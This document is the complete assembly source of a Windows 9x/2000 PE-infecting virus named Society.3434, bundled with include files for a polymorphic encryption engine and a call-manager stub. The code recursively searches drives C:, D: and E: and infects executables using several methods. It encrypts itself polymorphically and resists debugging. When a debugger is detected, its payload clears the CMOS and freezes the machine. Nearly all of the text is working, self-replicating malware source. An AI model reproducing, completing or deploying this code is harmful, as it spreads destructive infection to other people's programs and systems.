ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SOCIETY.TXT]ÄÄÄ
;==============================================================================
;                   Win9x/Win2k.Society.3434 (c) necr0mancer
;				december 2001
;ring-3 PE infector
;
;Features:
;
; *     Works only in win2k & win9x,but can work on winNT(I haven't it!) if
;       you add it kernel base on table (see source).
; *     Polymorphic (use NPE32 engine).
; *     Some infection methods (EPO,standart, .reloc OR .debug overwrite).
; *     Simple antidebug.
; *     Payload (on trace with td32:)) CMOS kill.)
; *     Not infecting winzip self-extactors & upx-packed files
;
;Tnx: to all who write stuff.
;                          Infection sheme:
;
;==============================================================================
;                           ÚÄÄÄÄÄÄÄÄÄÄÄ¿
;                           ³   main    ³     ÍÍÍÍÍ  - incorect secton size
;                           ÀÄÄÄÄÄÂÄÄÄÄÄÙ
;                           ÚÄÄÄÄÄÁÄÄÄÄÄ¿
;                           ³ find reloc³
;                           ÀÄÄÄÄÄÂÄÄÄÄÄÙ
;                       ÚÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄ¿
;                    ÚÄÄÁÄÄÄ¿           ÚÄÄÄÁÄÄ¿
;    ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´findedÆÍÍÍÍÍÍ»    ³failed³
;    ³               ÀÄÄÂÄÄÄÙ      º    ÀÄÄÄÂÄÄÙ
;    ³        ÚÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄ¿    º   ÚÄÄÄÄÁÄÄÄÄÄÄÄÄ¿
;    ³        ³ EPO infection ³  ÚÄ×ÄÄÄ´ find .debug ³
;    ³        ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ  ³ º   ÀÄÄÄÄÂÄÄÄÄÄÄÄÄÙ
;    ³                           ³ º        ³
;    ³ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿    ³ º   ÚÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;    ÀÄ´Overwrite infection ÃÄÄÄÄÙ ÈÍÍ͵"standart" infection ³
;      ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ          ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
;
;
;==============================================================================



include  1.inc
include  win.inc

PAGE_READWRITE equ  4
FILE_MAP_WRITE equ  2
DEBUG          equ  0                                   ;no debug-release;)

extrn   MessageBoxA:near
extrn   ExitProcess:near


VIRTUAL_SIZE  equ (offset _endvbody-offset _start)
PHYSICAL_SIZE equ (offset _fbodyend-offset _start)
DEBUG         equ 0

        .586p
        .model flat

        .data

message_title  db '[Dekadance] has been start.',0

_message       db 'Credo:',0dh
               db 'Dekadance is lifestyle.',0dh,0dh
               db 'Copyleft (c) 2001 necr0mancer',0
        .code

_emulation:

                push eax                                ;jmp viri
                xor eax,eax
                jmp _callz_manager

Original:

                push MB_ICONEXCLAMATION
                push offset message_title
                push offset _message
                push 0
                call MessageBoxA

                push    0
                call ExitProcess                        ; call    ExitProcess

;------------------------------------------------------------------------------
;Run loader
_callz_manager:

                pushfd                                  ;save flags&regs
                pusha

@cm             equ             <-offset @@GetDelta>

                call @@GetDelta                         ;get delta
@@GetDelta:
                pop ebp

if  DEBUG eq 1
                int 3
endif


                and eax,0ffh                            ;AL=# in function table
                push eax
                push ebp

                xor edi,edi

nop_call:
                call _start
                pop ebp

                push edi
                lea edi,[ebp+nop_call @cm]
                mov eax,90909090h                       ;write nop for next call
                stosd
                stosb
                pop edi

                pop eax                                 ;eax=# in function table
                shl eax,3                               ;eax*8

                or edi,edi                              ;first mng_call?
                jnz table_offset_exist

                db (0b8h OR __edi)                      ;mov edi,xxxxxxxx
                delta_tbl dd 0

                jmp short get_me_out

table_offset_exist:

                mov [ebp+delta_tbl @cm],edi             ;save table_pointer
                                                        ;for next calls
get_me_out:
                lea edi,[edi+eax]

                mov eax,[esp+8*4+4]                     ;restore old eax
                mov [esp._eax],eax
                mov [esp+8*4+4],edi                     ;write ret adr

                popa
                popfd
                ret

;==============================================================================
;Virii part

@ex             equ             <-offset Delta>

_start:
                call Delta                              ;get Delta
Delta:

if DEBUG eq 1
                int 3
endif
                pop ebp
                jmp short AfterData                     ;go to main part

;                          === some data ===

imagebase       dd 00400000h
OldRVA          dd (offset Original-00400000h)
fmask           db '*.exe',0

tbl:

                dd 77e80000h
                dd 0Bff70000h
                dd 0

jmp_table:
                mov eax,offset Original
                jmp eax
                dq 9 dup (0)

Mask_table:

                db 2
                dw 025FFh                               ;jmp xxxxxxx
                db 0
                db 0
                db 0

;=============================================================================
Fsize           dd ?
Voff            dd ?
Foff            dd ?
MZbase          dd ?

AfterData:

                db 0b8h                                 ;mov eax,xxxxxxxx
                reTT_need dd 1                          ;flag of type infection

                or eax,eax
                jnz no_need_heh

                mov eax,[ebp+OldRVA @ex]                ;restore old entrypoint
                add eax,[ebp+imagebase @ex]
                push eax                                ;FOR returning in prog

no_need_heh:

                lea esi,[ebp+jmp_table @ex]             ;copy adr_table
                lea edi,[ebp+jmp_tmp_table @ex]
                mov ecx,10*2
                rep movsd

                lea eax,[ebp+offset @@@error_handle @ex];find kernel base
                push eax

                xor eax,eax
                push 4 ptr fs:[eax]                     ;set SEH
                mov fs:[eax],esp

                lea esi,[ebp+offset tbl @ex]            ;possible kernel bases
                lea edi,[ebp+offset __kernel32 @ex]

                pusha
                jmp _lodsd
_ex:
                pop 4 ptr fs:[eax]                      ;restore SEH
                pop eax                                 ;
                jmp no_yet                              ;& exit

;=============================================================================

@@@error_handle:

                mov esp,[esp+8]
                sub esp,20h

_lodsd:
                popa
                lodsd
                or eax,eax                              ;end of table ?
                je _ex
                mov [edi],eax
                pusha

                db 0b8h
__kernel32      dd 0


                cmp word ptr[eax],'ZM'                  ;test on MZ
                jne _lodsd
__ok:
                xchg eax,ebx
                xor eax,eax
                add esp,20h
                pop 4 ptr fs:[eax]                      ;restore SEH
                pop eax

;==============================================================================

sys_ok:

                lea esi,[ebp+offset _Table @ex]         ;table of CRC32
                lea edi,[ebp+offset _adr @ex]           ;table of needed
                                                        ;function's adresses
Ft_repeat:

                call get_proc_adr                       ;find adress

                or eax,eax                              ;no finded :(
                jz  end_Ft_cycle
                stosd

                jmp Ft_repeat

end_Ft_cycle:


                out 70h,al                              ;
                in al,71h                               ;
                inc al                                  ;
                shl eax,8                               ;
                mov ecx,1000000                         ; GET RANDOM NUMBER
                loop $                                  ;
                out 70h,al                              ;
                in al,71h                               ;
                not eax
                                                        ; save it
                mov [ebp+__seed @ex],eax                ; for virii
                inc eax                                 ;
                mov [ebp+runSeed @ex],eax               ; and for NPE


                xor eax,eax                             ;files infected=0
                mov 4 ptr[ebp+FileNum @ex],eax

                mov [ebp+our_ebp @ex],ebp               ;save current delta
                                                        ;for creating thread

                xor ebx,ebx                             ;ebx=0

                lea eax,[ebp+offset Thr_indefirer @ex]
                push eax

                push ebx                                ;push 0
                push ebx                                ;push 0

                lea eax,[ebp+offset Thread_proc @ex]    ;offset to thread proc
                push eax

                push ebx                                ;push 0
                push ebx                                ;push 0
                call [ebp+CreateThread @ex]             ;Create thread

no_yet:
                lea edi,[ebp+offset jmp_tmp_table @ex]  ;get jmp_table pointer
                                                        ;to calls_manager
                retn                                    ;exit to parent code

Thread_proc:

                db (0b8h or __ebp)                      ;mov ebp,xxxxxxxx
                our_ebp dd 0

                lea edi,[ebp+SearchRec @ex]
                lea edx,[ebp+dirname @ex]
                mov [edx],'\:C'
                call filefind                           ;infect drives

                mov [edx],'\:D'
                call filefind

                mov [edx],'\:E'
                call filefind

                db 0b8h                                 ;mov eax,xxxxxxxx
Thr_indefirer   dd 0

                push eax
                call [ebp+ExitThread @ex]               ;good bye!

;=========================================================================================
;Input: esi=offset of string
;       ebx=kernel adr
;Out  : eax=adr(if has finded;))

get_proc_adr       proc

                push edi

                push eax
                lodsd
                mov [ebp+crc32 @ex],eax                 ;save getted crc
                pop eax

                mov ecx,[ebx+3ch]                       ;PE-header offset
                add ecx,ebx

                mov ecx,[ecx+78h]                       ;Export table offset
                jecxz return_0                          ;if (et=null) then err

                add ecx,ebx                             ;ecx-offset of export
                                                        ;table
                xor edi,edi
_search:

                mov edx,[ecx+20h]                       ;offsets on FuncNames
                add edx,ebx                             ;correct on base

                mov edx,[edx+edi*4]
                add edx,ebx

                push esi                                ;crc table
                push ecx                                ;base

                mov esi,edx
                push edx

find_zero:

                lodsb
                or al,al
                jnz find_zero
                dec esi

                sub esi,edx
                xchg ecx,esi

                pop esi
                call CRC32

                db (0b8h or __edx)                      ;mov edx,crc
                crc32  dd 0

                pop ecx                                 ;base
                pop esi                                 ;table

                cmp edx,eax
                je _name_found

                inc edi
                cmp edi,[ecx+18h]
                jb _search

return_0:

                xor eax,eax                             ;error ocures
                jmp _return

_name_found:
                                                        ;esi=index on string table
                mov edx,[ecx+24h]
                add edx,ebx
                movzx edx,word ptr [edx+edi*2]

                mov eax,[ecx+1ch]                       ;AdrTable
                add eax,ebx                             ;correct on base

                mov eax,[eax+edx*4]
                add eax,ebx                             ;get adress of nedded function

_return:

                pop edi                                 ;in output eax
                retn
get_proc_adr       endp


;=============================================================================
;                               INFECT
;=============================================================================

infect  proc
                pushad

                mov esi,edx                             ;esi=edx=full name

_findzero:
                lodsb
                or al,al
                jnz _findzero
                                                        ;esi=offset of null byte+1
                mov eax,[esi-4]

                cmp eax,00455845h                       ;EXE?
                je exe_infect

                cmp eax,00657865h                       ;exe?
                jne no_EXE

exe_infect:

                cmp byte ptr [ebp+FileNum @ex],15
                ja no_EXE                               ;More than 15 files?

_gogo:
                call fopen                              ;edx=FileName

                or eax,eax                              ;error ocures?
                je i_close_exit

                xchg ebx,eax                            ;ebx=handle
                call f_createmap                        ;createfilemapping

                mov [ebp+MZbase @ex],eax
                xchg eax,edx                            ;edx=mem_adr

                mov ax,word ptr[edx+18h]
                cmp al,40h
                jne i_close_exit

                mov eax,[edx+3ch]
                add edx,eax                             ;EDX=offset of PE header
                mov eax,[edx]
                cmp ax,'EP'                             ;really PE ?
                jne i_close_exit


;get last section

                movzx eax,word ptr[edx+14h]             ;NT header size
                add eax,18h                             ;Size of PE-header
                add eax,edx                             ;Eax=offset of Object table

                push eax
                push edx

                movzx eax,word ptr[edx+6h]              ;Number of objects

                dec eax
                smov esi,40                             ;size of table
                mul esi                                 ;result in EDX:EAX

                xchg esi,eax                            ;ESI=offset of last object

                pop edx
                pop eax

                mov edi,eax                             ;edi=Object-table
                add esi,eax                             ;correct(esi=last object)

                push edi

;=============================================================================

;find  winzip or UPX0

                mov al,1
                movzx ecx,word ptr[edx+6h]              ;Number of objects
find_upx:

                cmp 4 ptr[edi],'niw_'                   ;_winzip_
                je zip_upx

                cmp 4 ptr[edi],'0XPU'                   ;UPX0
                je zip_upx

                add edi,40
loop   find_upx

                xor eax,eax
zip_upx:
;=============================================================================
                pop edi
                or eax,eax
                jnz i_close_exit

                mov eax,[edx+34h]                       ;get & save imagebase
                mov [ebp+imagebase @ex],eax

                mov ecx,[esi+10h]                       ;get Fsize
                mov [ebp+Fsize @ex],ecx

                mov eax,[esi+8h]                        ;get Vsize
                or eax,eax                              ;Vsize=0?
                jz i_close_exit

                or ecx,ecx                              ;Fsize=0?
                jz i_close_exit

                cmp eax,ecx                             ;Vsize<Fsize
                jb i_close_exit

                mov eax,[esi+14h]                       ;get Foffset
                mov [ebp+Foff @ex],eax

                mov eax,[esi+0Ch]                       ;get Voffset
                mov [ebp+Voff @ex],eax

                mov ecx,'emit'                          ;check & write sign
                cmp [edx+08h],ecx
                je i_close_exit
                mov [edx+08h],ecx

                push esi                                ;esi=last (copy)
                push eax                                ;SAve VO of virii
                push edi                                ;obj-table offst



;find .reloc section
                movzx ecx,word ptr[edx+6h]              ;Number of objects
find_reloc:

                cmp 4 ptr[edi],'ler.'                   ;.reloc
                je question_EPO

                add edi,40
loop            find_reloc

;==============================================================================
;find .debug section

                pop edi                                 ;begin of sections tabl.
                movzx ecx,word ptr[edx+6h]              ;Number of objects
find_debug:
                cmp 4 ptr[edi],'bed.'                   ;.debug
                je @@reloc_debug_finded

                add edi,40
loop   find_debug

;==============================================================================
;neither .reloc nor .debug not finded

                jmp @@Standart

@@reloc_finded_stack:

                pop eax                                 ;clear stack

@@reloc_debug_finded:                                   ;.reloc or .debug are finded

                mov eax,[ebp+MZbase @ex]                ;begin of Exe
                add eax,[edi+14h]                       ;esi=Physical_Offset of .debug section
                mov 4 ptr[ebp+reloc_offset @ex],eax
@@Overwrite:
                add esp,4*2

                xor ecx,ecx
                mov [ebp+reTT_need @ex],ecx             ;set flag @@overwrite=0

                xchg edi,esi                            ;esi=.reloc secton

                lea eax,[edx+28h]                       ;set new RVA
                mov ecx,[eax]
                or ecx,ecx
                jz   i_close_exit                       ;RVA=0

                mov [ebp+OldRVA @ex],ecx

                mov ecx,[esi+0ch]                       ;section RVA
                mov [eax],ecx

                mov eax,10000                           ;get 10 kb
                call GetMem

                push eax
                xchg edi,eax

                call call_NPE32                         ;edi=bufer dectination

                mov  [esi+24h],0E0000020h               ;set attributes
                add  [esi+10h],ecx                      ;Add virus size

                xchg edi,esi                            ;esi=data
                db (0B8h or __edi)                      ;mov edi,xxxxxxxx
reloc_offset  dd 0
                rep movsb                               ;write virii

                jmp common_exit

@@Standart:
                pop esi                                 ;<<<clear stack
                pop esi

                xor ecx,ecx
                mov [ebp+reTT_need @ex],ecx             ;set flag @@overwrite=0

                lea edi,[edx+28h]                       ;set new RVA
                mov ecx,[edi]
                or ecx,ecx                              ;RVA==0    ?
                jz   i_close_exit

                mov [ebp+OldRVA @ex],ecx
                mov eax,[ebp+Voff @ex]
                add eax,[ebp+Fsize @ex]                 ;eax=virtual offset+physic size=new RVA
                mov [edi],eax

                mov eax,10000                           ;10 kb
                call GetMem
                push eax
                xchg edi,eax

                mov ecx,[edx+38h]                       ;Virtual aligment
                mov eax,VIRTUAL_SIZE+400h*2             ;add 2 kb for decryptor
                call Round                              ;align to phys_aligment

                add  [esi+08h],eax                      ;Add virus size to section
                mov  eax,[esi+08h]

                mov ecx,[ebp+Voff @ex]                  ;Virtual offset+virtualsize
                add ecx,eax
                mov [edx+50h],ecx                       ;Correct imageSize

                mov [esi+24h],0E0000020h                ;set attributes

                call call_NPE32
                add  [esi+10h],ecx                      ;Add virus size

                push ecx
                mov ecx,[ebp+Foff @ex]
                add ecx,[ebp+Fsize @ex]                ;Offset of end of last section
                call fseek
                pop ecx                                ;restore cpypted_size

                call fwrite                            ;write virii

                jmp common_exit

;==============================================================================
question_EPO:

                cmp 4 ptr[edi+10h],PHYSICAL_SIZE+900h   ;check section size
                jnb size_s_ok

                pop eax                                 ;<<<clear stack
                jmp @@Standart                          ;standart infect
size_s_ok:                                              ;if reloc < virsize

                smov eax,3                              ;max 2
                call randomGen                          ;get random number

                or eax,eax                              ;0 = make overwrite
                jnz _dbg                                ;1 = make EPO
                                                        ;2 = debugers sucks:)
                                                        ; & EPO
_clear_one_param:

;               pop eax                                 ;<<<clear stack
;               jmp @@reloc_debug_finded
                jmp @@reloc_finded_stack

_dbg:
                dec eax                                 ;eax==1?
                jz @@reloc_EPO

                call Debuger_fuckup

@@reloc_EPO:

                pop eax                                 ;first obj.

                inc 4 ptr[ebp+reTT_need @ex]            ;set flag @@overwrite
                                                        ;into 1 or whatever value

                mov esi,[ebp+MZbase @ex]                ;begin of Exe
                add esi,[eax+14h]                       ;esi==Physical_Offset of first section

                pop eax                                 ;clear stack<<<<

                mov eax,[ebp+Voff @ex]
                add eax,[ebp+Fsize @ex]                 ;eax=virtual offset
                                                        ;+physic size=new RVA

                mov ecx,[edi+0ch]                       ;get section RVA

                pop eax                                 ;clear stack<<<<
                push edi                                ;.reloc offset

                mov edi,[edi+14h]                       ;edi=offset of .reloc section
                add edi,4 ptr[ebp+MZbase @ex]           ;correct on begin of file

                mov eax,400h                            ;write_some_garbage
                call randomGen
                inc eax
                add ecx,eax                             ;correct RVA_reloc

                add eax,edi
                mov [ebp+EPO_edi @ex],eax

                lea eax,[ebp+Mask_table @ex]
                push eax

                lea eax,[ebp+replace @ex]
                push eax

                smov eax,10                             ;get random (max 10)
                call randomGen
                inc eax

                push eax                                ;count of functions
                push edi                                ;RELOC offset
                push esi                                ;CODE  offset
                push ecx                                ;virtual offset

;-----------------------------------------------------------------------------
;Create_UEP(
;       dword   VO                      // virtual offset
;       *dword  code                    // offset to .code section(already has read)
;       *dword  reloc                   // offset to .reloc section(already has read)
;       dword   num_records             // count of records in table to rewrite
;       *dword  adr_modify              // address of "replasing" proc
;       *dword  mask_table              // pointer to a mask table
;        );
;-----------------------------------------------------------------------------

                call Create_UEP

                pop esi                                 ;restore original esi
                jc  i_close_exit                        ;no_relocs_finded :(

                mov eax,10000                           ;get 10 kb
                call GetMem
                push eax
                xchg edi,eax                            ;edi=mem

                call call_NPE32                         ;cpypt virii

                add  [esi+10h],ecx                      ;Add virus size
                mov  [esi+24h],0E0000020h               ;set attributes

                push ecx
                push edi

                db (0b8h or __edi)                      ;mov edi,EPO_edi
                EPO_edi dd 0

                lea esi,[ebp+c_manager @ex]
                mov ecx,cm_size                         ;manager size
                rep movsb                               ;copy "manager"

                pop esi
                pop ecx
                rep movsb                               ;copy virii

common_exit:

                call [ebp+GlobalFree @ex]               ;free memory
                inc byte ptr [ebp+FileNum @ex]

i_close_exit:

                call  f_closemap                        ;unmap file from memory
                call  fclose                            ;close file
no_EXE:

                popad
                retn

infect  endp

;==============================================================================
;In: edx=dirname
;    edi=SearchRec
filefind  proc
                pushad

                sub   esp,1024                          ;for full directory name

                mov esi,edx                             ;esi=offset of dirname
                mov edi,esp                             ;edi=memory for FULL dirname

_scopy:
                lodsb
                stosb
                or al,al                                ;end of ASCIIZ string?
                jnz _scopy

                dec edi

                mov al,'\'                              ;add '\' if need
                cmp [edi-1],al
                je _estislesh
                stosb
_estislesh:

                mov esi,edi                             ;esi=position for file/dir

                mov eax,'*.*'
                stosd
                mov eax,esp

                mov edi,[esp+1024]                      ;restore edi
                push  edi

                push  eax

                call  [ebp+FindFirstFile @ex]           ;eax=handle for search

                inc eax
                jz    ff_quit                           ;cmp eax,-1
                dec eax

                xchg  ebx,eax                           ;search handle

ff_infect:

                push ecx                                ;pause
                mov ecx,1000000
                loop $
                pop ecx


                pushad
                xchg esi,edi                            ;edi=position of file/dir,esi=ff_struc
                lea esi,[esi].ff_fullname               ;esi=finded name
_sadd:

                lodsb                                   ;string add
                stosb
                or al,al
                jnz _sadd
                popad

                mov edx,esp                             ;FULL name of file/dir

                test  byte ptr [edi].ff_attr, 16
                jnz   ff_dir                            ;dir?

                call  infect                            ;no dir,infect
                jmp ff_next

ff_dir:

                cmp  byte ptr [edi].ff_fullname,'.'
                je   ff_next

                call filefind

ff_next:

                push edi
                push ebx
                call [ebp+FindNextFile @ex]

                or eax,eax
                jnz   ff_infect                         ;no dirs/files?

ff_quit:

                push ebx
                call [ebp+FindClose @ex]

                add esp,1024

                popad
                retn
filefind  endp


;==============================================================================
;In  : edi=bufer
;Out : ecx=size generated
;modify :eax,edx,ecx
call_NPE32      proc

		call Debuger_fuckup

                push ebx
                push edx
                xor eax,eax
                inc eax
                cpuid                                   ;get unical value
                xor eax,edx                             ;for this CPU
                pop edx
                pop ebx

                push eax                                ;move it in flags

                mov eax,[ebp+offset runSeed @ex]
                push eax                                ;seed (or NULL)

                xor eax,eax
                mov [ebp+offset runSeed @ex],eax        ;seed has been
                                                        ;inicialized == NULL

_push_size:

                mov eax,PHYSICAL_SIZE
                push eax                                ;size

                push edi                                ;bufer

                lea eax,[ebp+offset _start @ex]         ;data
                push eax


;==============================================================================
;int NPE_main(
;      offset data
;      offset bufer
;      count_bytes
;      seed (nul if not 1st generation)
;      flags
;      )
;==============================================================================

                call npe_main                           ;out eax=size
                xchg ecx,eax
                jnc  e_call_npe32                       ;if no errors

;----------------               error              ------------------

                mov ecx,PHYSICAL_SIZE
                pusha
                lea esi,[ebp+offset _start @ex]         ;data
                ;edi = bufer
                rep movsb                               ;copy virii to bufer
                popa
e_call_npe32:
                retn
call_NPE32      endp
;==============================================================================


GetMem  proc

                pusha
                push eax
                push GMEM_FIXED
                call [ebp+GlobalAlloc @ex]              ;GetMemory
                ;eax=offset of getted memory

                mov [esp._eax],eax
                popa

                retn
GetMem  endp

;==============================================================================
;Input:ecx=field of rounding
;      eax=size
Round   proc
                bsr ecx,eax                             ;Scan backward for bit

                dec ecx

                shr eax,cl
                inc eax
                shl eax,cl

                retn
Round   endp

;==============================================================================
CRC32   proc
                pusha

                db (0b8h or __ebx)                      ;mov ebx,polinom
                polinom dd 04c11db7h

                xor edx,edx
next_8_bites:
                push ecx

                xor eax,eax
                lodsb
                shl  eax,32-8-1
                smov ecx,8
carry_find:

                shl eax,1
                shld edx,eax,1
                jnc not_carry

                xor edx,ebx
not_carry:

                loop carry_find

                pop ecx

                loop next_8_bites


                ;add null bites

                smov ecx,32+8+1
@carry_find:
                shl edx,1
                jnc @not_carry
                xor edx,ebx

@not_carry:
                loop    @carry_find

                mov [esp._eax],edx                      ;return CRc in eax

                popa
                ret
CRC32   endp

;==============================================================================
replace:

;=== copy old jumper to table===
;ecx=#of finded
;edi=offst of command(cor)
;ebx=offset of commnd(phys)
;esi=setted virtual offset
        pusha

        push esi

        push edi
        xchg edi,esi
        lea edi,[(ebp+offset jmp_table)+ecx*8 @ex] ;num in table
        movsd
        movsd
        pop edi

        mov ax,0b050h                   ;push eax+mov al
        stosw

       ;ecx=count/index
        xchg eax,ecx                     ;eax=num records param
        mov ah,0e9h                      ;jmp.....
        stosw

        pop eax                         ;VO
        sub eax,ebx
        sub eax,5+3                      ;Pa3Huya
        stosd

        popa
        retn
;==============================================================================






;=============================================================================
randomGen       proc
                pusha
                push eax                                ;save max_random

                db 0b8h                                 ;mov eax,xxxxxxxx
                __seed dd 12345678h

                mov edi,134775813                       ;eax=new seed
                mul edi                                 ;EDX:EAX=EAX*EDI
                inc eax
                mov [ebp+__seed @ex],eax

                xor edx,edx

                pop ecx
                or ecx,ecx                              ;max_random=0
                jz __div_0
                div ecx

                mov [esp._eax],edx

__div_0:
                popa
                ret
randomGen       endp

;=============================================================================
Debuger_fuckup          proc
                pusha

                call [ebp+IsDebuggerPresent @ex]        ;catch stupid TD32 ;)
                or eax,eax
                jnz fuckup

                push edi
                sidt [esp-2]
                pop  edi

                mov [edi+1*8],eax                       ;kill int 1
                mov [edi+3*8],eax                       ;kill int 3

                mov dr0,eax                             ;kill debug system regs
                mov dr1,eax                             ;NOTE:
                mov dr2,eax                             ;  SoftIce is interrupts
                mov dr3,eax                             ;  this commands &
                                                        ;  virii suck.
                popa
                retn

fuckup:
                smov eax,5eh                            ;Clear CMOS
                smov edx,70h
                call PM_out

                xor eax,eax
                smov edx,71h
                call PM_out

                jmp $

;=============================================================================
PM_out          proc

                push    eax
                push    edx
                mov     edx, esp
                smov     eax,0F7h                       ;WRITE_PORT_UCHAR
                int     2Eh
                add     esp, 2*4
                retn
PM_out          endp
;=============================================================================

Debuger_fuckup          endp

c_manager:
include call_mng.inc
cm_size equ $-offset c_manager

include RIPbin.inc
include ring3io.inc
include npe32bin.inc


_Table:

_CreateFileA            dd              0830F55B4h
_CreateFileMapping      dd              06817C213h
_MapViewOfFile          dd              0CF4C00A1h
_UnmapViewOfFile        dd              0C027BC23h

_CloseHandle            dd              07CD0735Bh
_ReadFile               dd              02804FB4Dh
_FindFirstFileA         dd              0A32BE888h
_FindNextFileA          dd              0233AEB5Eh
_FindClose              dd              0E6CCF387h
_GlobalAlloc            dd              06CCA7EE0h
_GlobalFree             dd              04753EBE5h
_SetFilePointer         dd              0E747C386h
_WriteFile              dd              018D5ABDFh
_GetCurrentDirectoryA   dd              0B089B6BEh
_IsDebuggerPresent      dd              015B27F29h
_ExitThread             dd              01E799321h
_CreateThread           dd              072F17A7Bh

its_over                dd              0FFFFFFFFh
_fbodyend:




_adr:
CreateFile              dd      ?           ;2

CreateFileMappingA      dd      ?
MapViewOfFile           dd      ?
UnmapViewOfFile         dd      ?

CloseHandle             dd      ?           ;3
ReadFile                dd      ?           ;4
FindFirstFile           dd      ?           ;6
FindNextFile            dd      ?           ;7
FindClose               dd      ?           ;8
GlobalAlloc             dd      ?           ;9
GlobalFree              dd      ?           ;a
SetFilePointer          dd      ?           ;b
WriteFile               dd      ?           ;c
GetCurrentDirectory     dd      ?     ;d
IsDebuggerPresent       dd      ?
ExitThread              dd      ?
CreateThread            dd      ?

;-------------------------------------

curdir          db 260 dup (?)
SearchRec       f_struc<,,,,,,,>

DirNum          db ?
FileNum         db ?
bytesread       dd ?


first_run_npe   dd ?
runSeed         dd ?
dirname         dd ?

jmp_tmp_table:
               dq 10 dup (?)
_endvbody:
end _emulation

;==============================================================================
;							 (C) necr0mancer 2001
;                            			  necr0mancer2001@hotmail.com
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[SOCIETY.TXT]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[1.INC]ÄÄÄ
MAX_GARBAGE equ 6
MAX_OPERATIONS equ 5

;cryptor size
; 100+(6*5*6*5)~1kb maximum
;
;


__eax equ 000b 
__ebx equ 011b 
__edx equ 010b 
__ecx equ 001b 
__esi equ 110b 
__edi equ 111b 
__ebp equ 101b 

smov macro p1,p2
if p2 gt 07fh

	 if p2 lt 100h

 		if p1 eq eax  
			xor eax,eax
			mov al,&p2&
		endif

		if p1 eq ebx  
			xor ebx,ebx
			mov bl,&p2&
		endif

		if p1 eq ecx  
			xor ecx,ecx
			mov cl,&p2&
		endif

		if p1 eq edx
			xor edx,edx
			mov dl,&p2&
		endif
	else

        	mov &p1&,&p2&

        endif

else
     push &p2&
     pop  &p1&
endif

endm

opcod struc
  code      dw 0
  flags     db 0
  code_num  db 0
opcod ends
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[1.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALL_MNG.INC]ÄÄÄ
;=============================================================================
;Api_call stub (c) necr0mancer
;necr0mancer2001@hotmail.com
;=============================================================================
db 09Ch,060h,0E8h,000h,000h,000h,000h,05Dh,0CCh,025h,0FFh,000h,000h,000h,050h
db 055h,033h,0FFh,0E8h,031h,000h,000h,000h,05Dh,057h,08Dh,07Dh,00Bh,0B8h,090h
db 090h,090h,090h,0ABh,0AAh,05Fh,058h,0C1h,0E0h,003h,00Bh,0FFh,075h,007h,0BFh
db 000h,000h,000h,000h,0EBh,003h,089h,07Dh,026h,08Dh,03Ch,007h,08Bh,044h,024h
db 024h,089h,044h,024h,01Ch,089h,07Ch,024h,024h,061h,09Dh,0C3h 
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[CALL_MNG.INC]ÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ[NPE32BIN.INC]ÄÄÄ
;==============================================================================
;                       Necromancer's Polymorphic Engine
;                                    v 1.0
;                        (c) necr0mancer december 2001
;
;
;stdcall
;int NPE_main(
;               DWORD   *offset data                    //offset to data
;               DWORD   *offset bufer                   //offset of bufer(see ramarks)
;               DWORD   count_bytes                     //size of crypting data
;               DWORD   seed                            //(see remarks)
;               DWORD   flags                           //(see remarks)
;            );
;
;Output: EAX = Size of crypted data and decryptor.
;        cf  = 1 if error 
;        cf  = 0 if success
;
;Remarks:
;    Engine must run in r/w section.
;
;   *bufer : Size of bufer must be larger of really size data beakose NPE use
;            bufer for building cryptor/decryptor.
;            In real size of bufer must be about 400h*3+size of data+1
;            But I test it with many-memory allocate & can't said
;            about working npe32 with little bufer.
;
;   Flags:
;
;         bits:
;        ÚÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
;        ³  0..6   ³ Using regs32                          ³
;        ÃÄÄÄÄÄÄÄÄÄÅÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
;        ³  7      ³ Antidebug functions enabled           ³
